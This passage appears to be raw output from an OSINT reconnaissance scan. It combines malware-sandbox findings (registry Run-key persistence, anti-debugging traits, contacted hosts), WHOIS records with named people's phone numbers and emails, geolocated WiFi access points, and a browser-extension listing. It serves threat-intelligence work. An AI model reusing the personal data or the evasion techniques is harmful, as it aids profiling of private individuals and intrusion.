"4053427758584377186a4377653c44770000000000bf57770000000056cc5777000000007cca577700000000376871756a2c4477d62d447700000000206971750000000029a6577700000000a48d717500000000f70e577700000000" to virtual address "0x76BE1000" (part of module "NSI.DLL")'}, {u'category': u'Unusual Characteristics', u'origin': u'Registry Access', u'identifier': u'registry-25', u'name': u'Reads information about supported languages', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 3, u'description': u'".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE", Key: "EN-US")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE", Key: "EN-US")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE", Key: "AR")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE", Key: "AR")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE", Key: "AR-SA")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE", Key: "AR-SA")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE", Key: "BG")\n ".exe" (Path: "\\REGISTRY\\MACHINE\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE", Key: "BG")'}, {u'category': u'Unusual Characteristics', u'origin': u'Static Parser', u'identifier': u'static-1', u'name': u'Imports suspicious APIs', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 1, u'type': 0, u'description': u'CreateFileA\n GetModuleHandleA\n GetStartupInfoA\n GetModuleFileNameA\n listen (Ordinal #13)'}, {u'category': u'Installation/Persistance', u'origin': u'Registry Access', u'identifier': u'registry-0', u'name': u'Modifies auto-execute functionality by setting a value in the registry', 
u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 8, u'threat_level': 1, u'type': 3, u'description': u'".exe" (Access type: "CREATE", Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN")\n ".exe" (Access type: "SETVAL", Path: "\\REGISTRY\\MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN", Key: "NETWORKUPDATER", Value: "C:\\94a258ebd0b0313bf9cc1aeddcd7473b2f4d383d6650fb394713dc3080faf84c.exe")'}, {u'category': u'Anti-Detection/Stealthyness', u'origin': u'API Call', u'identifier': u'api-38', u'name': u'Sets the process error mode to suppress error box', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 8, u'threat_level': 1, u'type': 6, u'description': u'".exe" set its error mode to SEM_NOOPENFILEERRORBOX'}, {u'category': u'Anti-Reverse Engineering', u'origin': u'StaticStream (Disassembly)', u'identifier': u'stream-4', u'name': u'Contains ability to register a top-level exception handler (often used as anti-debugging trick)', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 1, u'type': 1, u'description': u'SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-52256-39-00503341\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-52256-40-005019B4\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-52256-311-004D9E24\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-47776-39-00503341\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-47776-40-005019B4\n SetUnhandledExceptionFilter@KERNEL32.DLL at 00011898-00002812-47776-311-004D9E24'}, {u'category': u'Environment Awareness', u'origin': u'StaticStream (Disassembly)', u'identifier': u'stream-31', u'name': u'Possibly tries to detect the presence of a debugger', u'attck_id_wiki': None, u'threat_level_human': 
u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 1, u'type': 1, u'description': u'GetProcessHeap@KERNEL32.DLL at 00011898-00002812-52256-144-004DC170\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-52256-781-00456F99\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-52256-562-0051F380\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-52256-252-00401E3C\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-47776-781-00456F99\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-47776-252-00401E3C\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-47776-562-0051F380\n GetProcessHeap@KERNEL32.DLL at 00011898-00002812-47776-144-004DC170'}, {u'category': u'Environment Awareness', u'origin': u'StaticStream (Disassembly)', u'identifier': u'stream-3', u'name': u'Contains ability to query the machine version', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 1, u'type': 1, u'description': u'GetVersionExA@KERNEL32.DLL at 00011898-00002812-52256-850-00414354\n GetVersionExA@KERNEL32.DLL at 00011898-00002812-47776-850-00414354'}, {u'category': u'Envir 81.88.48.101 2022-12-18 00:08:39 Netblock Membership No RIPE 0 0 2 0 None 188.114.97.0/24 188.114.97.9 2022-12-18 00:09:48 Co-Hosted Site No HackerTarget 0 0 2 0 None autodiscover.webelievenow.com 172.67.147.230 2022-12-18 00:13:49 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None contact@vosdomaines.com %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. 
%% domain: tain.fr status: ACTIVE eppstatus: active hold: NO holder-c: SC54767-FRNIC admin-c: SC54767-FRNIC tech-c: K6635-FRNIC registrar: KIFCORP Expiry Date: 2023-03-01T08:35:38Z created: 2021-03-01T08:35:38Z last-update: 2022-03-01T08:36:40Z source: FRNIC nserver: ns1.alpesc.net nserver: ns2.alpesc.net source: FRNIC registrar: KIFCORP address: 78 RUE D ALEMBERT address: 38000 GRENOBLE country: FR phone: +33.458000007 e-mail: contact@kifcorp.fr website: https://www.kifdom.com/faq.php anonymous: No registered: 2014-12-22T00:00:00Z source: FRNIC nic-hdl: SC54767-FRNIC type: PERSON contact: Sebastien Chevillet address: 10 Rue de Penthievre address: 75008 Paris country: FR phone: +33.768936738 e-mail: contact@vosdomaines.com registrar: KIFCORP changed: 2022-10-17T08:04:47.27595Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligsource: REGISTRAR eligdate: 2021-06-25T00:00:00Z reachstatus: ok reachmedia: email reachsource: REGISTRAR reachdate: 2021-06-25T00:00:00Z source: FRNIC nic-hdl: K6635-FRNIC type: ORGANIZATION contact: KIFCORP address: KIFCORP address: 78 rue d'Alembert address: 38000 GRENOBLE country: FR phone: +33.458000007 e-mail: contact@kifcorp.fr registrar: KIFCORP changed: 2022-12-16T10:49:00.573083Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligsource: REGISTRY eligdate: 2021-08-10T00:00:00Z reachstatus: ok reachmedia: phone reachsource: REGISTRY reachdate: 2021-08-10T00:00:00Z source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.695058Z <<< 2022-12-18 00:16:27 Open TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.97.9:443 188.114.97.9 2022-12-18 00:05:37 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None plague.fun 2022-12-18 00:03:06 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun 2022-12-18 00:17:08 SSL Certificate - Issued to No SSL Certificate Analyzer 0 0 2 0 None C=IT,ST=Firenze,O=Register S.p.A.,CN=*.amen.fr webmail.zerotwo-best-waifu.online 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNetCBD2 (Net ID: 00:01:36:59:CB:D0) 37.7803446,-122.3906132 2022-12-18 00:07:06 HTTP Status Code No Web Spider 0 0 2 0 None 200 http://misogyny.wtf:2020/copy 2022-12-18 00:14:46 HTTP Status Code No Web Spider 0 0 2 0 None 301 http://rasputain.fr/ 2022-12-18 00:31:00 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.chat plague.fun 2022-12-18 00:05:13 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None 20.226.83.185 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None herron-libson (Net ID: 00:01:24:F1:75:B2) 37.7803446,-122.3906132 2022-12-18 00:08:30 Physical Location No LeakIX 0 0 1 0 None Amsterdam, North Holland, Netherlands plague.fun 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None dabancolvalidat.dabancolvalidat.repl.co 34.149.204.188 2022-12-18 00:13:41 Affiliate - 
Email Address No E-Mail Address Extractor 0 0 5 0 None administration@nordnet.com %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: wanadoo.fr status: ACTIVE eppstatus: active hold: NO holder-c: ANO00-FRNIC admin-c: ANO00-FRNIC tech-c: BLF14-FRNIC registrar: NORDNET Expiry Date: 2023-09-06T11:03:56Z created: 1995-09-12T22:00:00Z last-update: 2022-10-31T23:07:53.716977Z source: FRNIC nserver: ns1.orange.fr nserver: ns2.orange.fr nserver: ns3.orange.fr nserver: ns4.orange.fr source: FRNIC registrar: NORDNET address: 20 Rue Denis Papin address: CS 20458 address: 59664 VILLENEUVE D'ASCQ CEDEX country: FR phone: +33.969360360 e-mail: administration@nordnet.com website: https://www.nordnet.com/offres/pack_relais/presentation.php anonymous: No registered: 1997-12-29T00:00:00Z source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: NORDNET anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. 
remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligdate: 2017-12-29T00:00:00Z reachstatus: not identified source: FRNIC nic-hdl: BLF14-FRNIC type: PERSON contact: Beatrice Leopold Fenu address: 78 Olivier de Serres address: 75015 Paris country: FR phone: +33.145298193 fax-no: +33.144440181 e-mail: gestionndd@francetelecom.biz registrar: NORDNET changed: 2018-01-09T13:39:00Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: NORDNET anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligdate: 2017-12-29T00:00:00Z reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:10:59.299088Z <<< 2022-12-18 00:09:29 Raw Data from RIRs No LeakIX 0 0 2 0 None 81.88.52.232 2022-12-18 00:06:45 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.fi plague.fun 2022-12-18 00:14:47 Internet Name - Unresolved No VirusTotal 0 0 1 0 None sparte.plague.fun plague.fun 2022-12-18 00:22:01 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 2a06:98c1:3121::1 2022-12-18 00:07:47 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.in plague.fun 2022-12-18 00:08:59 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.0:443 188.114.97.0 2022-12-18 00:18:27 Affiliate - Internet Name No DNS Resolver 0 0 2 0 None smtp-fr.securemail.pro smtp.zerotwo-best-waifu.online 2022-12-18 00:16:58 Web Content Type No Web Spider 0 0 4 0 None application/javascript http://webmail.zerotwo-best-waifu.online/js/vendor/jquery-3.5.0.min.js 2022-12-18 00:13:36 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None noc@cloudflare.com 2022-12-18 00:09:16 Physical Location No LeakIX 0 0 2 0 None Campinas, Sao Paulo, Brazil 20.226.56.97 2022-12-18 00:24:07 Affiliate - Email Address No E-Mail Address Extractor 0 0 2 0 None anonymous69anonymous666@gmail.com
Defend your city and become the most powerful lord of all!", "icon": "https://lh3.googleusercontent.com/XEp8ZomRS2zcjXMgyxguYq63-oZdJyXjLndPVteO79qXVwuVeYX5cgZTKFz1lE2rZ-rba7r1_hVNrROK7hqYRzIA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 131, "name": "Shadow Kings"}, "clkfdgnfefjmciocbhnffnbpkjpdleca": {"rating": 3.8338633, "users": 70000, "platform": "", "short_description": "Throw on your overalls and hit the fields!
Take home the blue ribbon as farmer of the year!", "icon": "https://lh3.googleusercontent.com/-biu79UGgMFr7LA32bnfg26g8pssU8e_Uvta1ysUUa1ainkKHGQdlBDTHKpKGGtc5rC254AVzmDmtNvqBr_VomUHHg=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 1258, "name": "FARMERAMA"}, "kkiklippbohodiogcpjgbjagfbajpobc": {"rating": 3.8280256, "users": 10000, "platform": "", "short_description": "Do you have what it takes to become a Legend? Gather your forces and prepare your heroes for battle in Legends of Honor!", "icon": "https://lh3.googleusercontent.com/4xUCZSCGvpG6yrO75panShmTUmoqOIVgWkPNMVzaQQUZf1tJnjKAqIsD6VPrtXPW7Yx1DIMvTHSnCicc0MOuFgUB=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 157, "name": "Legends of Honor"}, "beoejcompfcffbdhaknieiimbkakdbof": {"rating": 3.813187, "users": 23071, "platform": "", "short_description": "Help fire boy and water girl in their adventure.", "icon": "https://lh3.googleusercontent.com/Mi8D4FGay9rMrsOzg2ZsG5O8PN8vFSYRieCdbBjg6pT1JtCbd8Vf5tBlVeVG2rCfUReMLntT7AY=w128-h128-e365", "rating_users": 91, "name": "Fireboy And Watergirl"}, "hgmpilchchdmdnibhgnjjbghglgffgjp": {"rating": 3.74, "users": 9000, "platform": "", "short_description": "The 2nd World War: Tank clashes, Naval battles, Air combat. 
In Call of War you rewrite the course of history!", "icon": "https://lh3.googleusercontent.com/rca81fkmlP_1deL76lVVgQFDHHJXV_nrrgWrhh7fjRpGxlaiJ0LI7fDh-kcT_s0XFy4c48qzyB04TgzXqxpDlA3_=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 100, "name": "Call of War"}, "anaphblkfplenhkephgneolhnmjminjg": {"rating": 4.038013, "users": 100000, "platform": "", "short_description": "In Forge of Empires, you control the fate of your city throughout different historical periods.", "icon": "https://lh3.googleusercontent.com/o7i1oeutKe1UW8s0ECUXnCi6VplTAYUoMLQp7S9ba9f1efR1X7M7jFlgS49CclfFbMRwhHBtmDDkEyP9Yj2Az439qA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 2315, "name": "Forge of Empires"}, "apkldkehnmnkbcgkjbgchjghikcggpog": {"rating": 3.2212389, "users": 20000, "platform": "", "short_description": "Online webbrowser strategy game in a post apocolypitic world. Can you keep your town save from disaster?.", "icon": "https://lh3.googleusercontent.com/0KswqoNp3hk_FgGlha8lmXu-HFJWa3qpgiYFGU3LrU-wByWj5oP-rlJwo0X06dhrE9Sp-erRV3zqs5zI0FQfNfn-R9E=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 226, "name": "The Outbreak - Webbrowser strategy game"}, "agcokacflmihcgkgjofglkhobjkheeic": {"rating": 3.8041544, "users": 30000, "platform": "", "short_description": "Destiny calls. 
Will you die a wretched slave, or stand firm as a hero?", "icon": "https://lh3.googleusercontent.com/oTY2iF97936IRTmOkZkx-MxwWIvePEvhsEp5yn8SUpkJrafBb3saf-EHkzhbLqrtfpz6bEjy=w128-h128-e365", "rating_users": 337, "name": "Sparta: War of Empires"}, "llmmanebcflnklopeacnlgkpiehfacmd": {"rating": 3.958115, "users": 20000, "platform": "", "short_description": "Build a powerful army, show no mercy, and battle enemies for earth's last remaining resources in this massive real-time strategy\u2026", "icon": "https://lh3.googleusercontent.com/4DtWVAXXT8ndzKB9YfQArB4A6w3qcTI8bQVg2Im1vRDF6Pqdg7V14P3a6MKXBcsHumlr95n88bvwfJolkQkZgiVE=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 382, "name": "War Commander"}, "kkgkognjknhcgbgbeijjondlikfkgnog": {"rating": 4.0218296, "users": 60000, "platform": "", "short_description": "Build magnificent cities, forge mighty alliances, utilize the power of the gods, conquer the world!", "icon": "https://lh3.googleusercontent.com/DicNXkYIbO-QUz_W3yfBwAs7qIk53yXJIP43hOOIt99y2-daHB0rwKkYPTTv76ItPjbbDqQ77UMFV12LNg_IHPtRMNI=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 962, "name": "Grepolis"}, "jfknmahjfliijedjbhonlmjenllgjhgj": {"rating": 3.8932583, "users": 84980, "platform": "", "short_description": "Battle live players in this turn-based artillery game!", "icon": "https://lh3.googleusercontent.com/IgOZ8fb6-DdXq5c60EdLxFv51B5mUeyXdp4yqEVyGP9h3OBTY0Jpo1upRAr-DzlDW4sWSwUG=w128-h128-e365", "rating_users": 178, "name": "Territory War 3"}, "hondhndnlnmjbmlgjigpicjoijbecdgn": {"rating": 3.6326923, "users": 90000, "platform": "", "short_description": "Brutal mercenary warfare, bleeding-edge technology, no holds barred.", "icon": "https://lh3.googleusercontent.com/n-nIo0f73nDmoRGSdd4XTETH15Wu6z2dgBNH7i7xYo4-GHhA1G3IDOmUONbdG1OZhVTlg5PT7jE=w128-h128-e365", "rating_users": 520, "name": "Soldiers Inc."}}, "manifest": {"oauth2": {"scopes": [], "client_id": "133701689125-jj0hr4gb0ff4ulsbrn0uk2i4th946d4c.apps.googleusercontent.com"}, "arc_metadata": 
{"apkList": ["app-release"], "enableExternalDirectory": false, "useGoogleContactsSyncAdapter": false, "usePlayServices": ["gcm"], "orientation": "landscape", "formFactor": "fullscreen", "packageName": "com.miniclip.plagueinc", "resize": "reconfigure", "name": "com.miniclip.plagueinc"}, "name": "Plague Inc", "default_locale": "en", "icons": {"128": "icon.png", "16": "icon.png"}, "app": {"background": {"page": "app_main.html"}}, "requirements": {"3D": {"features": ["webgl"]}}, "offline_enabled": true, "version": "1342", "manifest_version": 2, "import": [{"id": "mfaihdlpglflfgpfjcifdjdjcckigekc"}], "update_url": "https://clients2.google.com/service/update2/crx", "permissions": ["gcm", {"socket": ["tcp-connect", "tcp-listen", "udp-bind", "udp-send-to", "resolve-host"]}, "unlimitedStorage", "notifications", "clipboardRead", {"fileSystem": ["write"]}, "https://clients2.google.com/", "videoCapture", "clipboardWrite", "identity.email", "alarms", "storage", "identity", "audioCapture"]}}, "extension_id": "dnejacfgfaldfjameaaaledklokkacbc"}] 2022-12-18 00:09:36 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.12:443 188.114.96.0/24 2022-12-18 00:22:04 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 404 Not Found TE: chunked Transfer-Encoding: chunked Content-Type: text/html 90.116.166.104 2022-12-18 00:18:10 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.3:8443 188.114.97.0/24 2022-12-18 00:08:30 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.52.223:80 81.88.52.223 2022-12-18 00:04:29 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.21.28.240', u'104.16.85.20', u'99.84.167.3', u'99.84.170.89', u'13.249.90.138'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://consolegames.down10.software/bios/pcsx2-playstation-2-bios-3', u'signatures': [{u'category': u'General', u'origin': u'Binary File', 
u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "svg-sprite.4da5413f5086c5755b46094b813dbfcd_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.28.240:443"\n "142.250.72.130:443"\n "104.16.85.20:443"\n "142.251.40.35:80"\n "199.232.192.134:443"\n "142.250.68.34:443"\n "142.250.217.130:443"\n "172.217.14.98:443"\n "151.101.64.134:443"\n "99.84.167.3:443"\n "199.232.192.64:443"\n "99.84.170.89:80"\n "142.250.68.65:443"\n "142.250.68.98:443"\n "142.250.188.227:443"\n "77.88.21.119:443"\n "13.249.90.138:80"\n "154.47.36.46:443"\n "142.251.40.42:443"\n "192.184.69.149:443"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" touched "WinInetBroker Class" (Path: "HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}")\n "iexplore.exe" touched "PSFactoryBuffer" (Path: "HKCU\\CLSID\\{057EEE47-2572-4AA1-88D7-60CE2149E33C}")\n "iexplore.exe" touched "Network List Manager" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32")\n "iexplore.exe" touched "Cor MIME Filter, CorFltr, CorFltr 1" (Path: 
"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1E66F26B-79EE-11D2-8710-00C04F79ED0D}\\PROGID")\n "iexplore.exe" touched "Groove Folder Synchronization" (Path: "HKCU\\CLSID\\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}\\TREATAS")\n "iexplore.exe" touched "Groove GFS Browser Helper" (Path: "HKCU\\CLSID\\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\\TREATAS")\n "iexplore.exe" touched "MSAA AccPropServices" (Path: "HKCU\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\INPROCSERVER32")\n "iexplore.exe" touched "Task Bar Communication" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{56FDF344-FD6D-11D0-958A-006097C9A090}\\INPROCSERVER32")\n "iexplore.exe" touched "Internet Explorer(Ver 1.0)" (Path: "HKCU\\CLSID\\{0002DF01-0000-0000-C000-000000000046}\\PROGID")\n "iexplore.exe" touched "WebBrowserHandler Proxy" (Path: "HKCU\\CLSID\\{3CB169B3-17D9-4E47-8B93-2878998F69A2}\\TREATAS")\n "iexplore.exe" touched "PSDispatch" (Path: "HKCU\\CLSID\\{00020420-0000-0000-C000-000000000046}\\PROGID")\n "iexplore.exe" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "iexplore.exe" touched "Memory Mapped Cache Mgr" (Path: "HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\INPROCSERVER32")\n "iexplore.exe" touched "UsersFiles" (Path: "HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n "iexplore.exe" touched "Property System Both Class Factory" (Path: "HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS")\n "iexplore.exe" touched "Shockwave Flash Object" (Path: "HKCU\\CLSID\\{D27CDB6E-AE6D-11CF-96B8-444553540000}\\INPROCSERVER32")\n "iexplore.exe" touched "Security Manager" (Path: "HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS")\n "iexplore.exe" touched "NetworkListManager" (Path: "HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\\TREATAS")\n "iexplore.exe" touched "ShellWindows" (Path: "HKCU\\CLSID\\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}\\LOCALSERVER32")\n "iexplore.exe" touched "Office Document Cache Handler" (Path: 
"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\\INPROCSERVER32")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "o.ss2.us"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "yandex.ocsp-responder.com"\n "ocsp.sectigo.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d78_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d78_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d78_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d78_IE_EarlyTabStart_0xc28_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d78_ConnHashTable<3448>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d78_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3448"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3448"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, 
u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"\n "logo_1_.svg" has type "HTML document ASCII text with very long lines"\n "svg-sprite.4da5413f5086c5755b46094b813dbfcd_1_.svg" has type "SVG Scalable Vector Graphics image"\n "f_6_.txt" has type "ASCII text with very long lines"\n "739F2FF4259CDC6CBE7B90F1A95601EF" has type "data"\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"\n "KB64NSN3.txt" has type "ASCII text"\n "CWBMBUPF.txt" has type "ASCII text"\n "1B1F4BA66CDBFEC85A20E11BF729AF23_AA85F8F9DAFF33153B5AEC2E983B94B6" has type "data"\n "578YFEMC.txt" has type "ASCII text"\n "DJ234UW7.txt" has type "ASCII text"\n "ZPYEJW3Y.txt" has type "ASCII text"\n "GB5X8XH6.txt" has type "ASCII text"\n "iframe_1_.htm" has type "HTML document ASCII text with no line terminators"\n "E887E036775F4159E2816B7B9E527E5F_4C2E81DE76C8EDFC85D7A7D77938D5CD" has type "data"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"\n "709A8EC0F6D3194AD001E9041914421F_B8D287E220F7AC71F428E1008F0A1988" has type "data"\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"\n "7LDUCZHU.txt" has type "ASCII text"'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-55', u'name': u'Reads the registry for installed applications', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: 